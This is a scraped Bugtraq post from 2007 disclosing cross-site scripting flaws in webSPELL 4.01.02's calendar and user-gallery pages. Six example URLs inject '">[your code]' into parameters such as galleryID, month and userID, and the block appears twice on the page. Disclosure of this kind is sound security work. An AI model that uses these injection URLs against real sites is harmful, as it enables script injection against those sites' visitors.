Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
Back to list
|
Post reply
webSPELL 4.01.02 (calendar.php, usergallery.php) XSS Vulnerability
Dec 08 2007 10:53PM
brainheadbrainhead gmx de
###################
Autor: Brainhead
Type: XSS
Version: 4.01.02
Files: usergallery.php, calendar.php
Magic Quotes :off
###################
Examples:
http://site.tld/[PATH]/index.php?site=usergallery&action=upload&galleryI
D=">[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&upID=">[y
our code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&tag=">[yo
ur code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&month=">[
your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&userID=">
[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&year=">[y
our code]
[ reply ]
Privacy Statement
Copyright 2008, SecurityFocus
Autor: Brainhead
Type: XSS
Version: 4.01.02
Files: usergallery.php, calendar.php
Magic Quotes :off
###################
Examples:
http://site.tld/[PATH]/index.php?site=usergallery&action=upload&galleryI
D=">[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&upID=">[y
our code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&tag=">[yo
ur code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&month=">[
your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&userID=">
[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&year=">[y
our code]
[ reply ]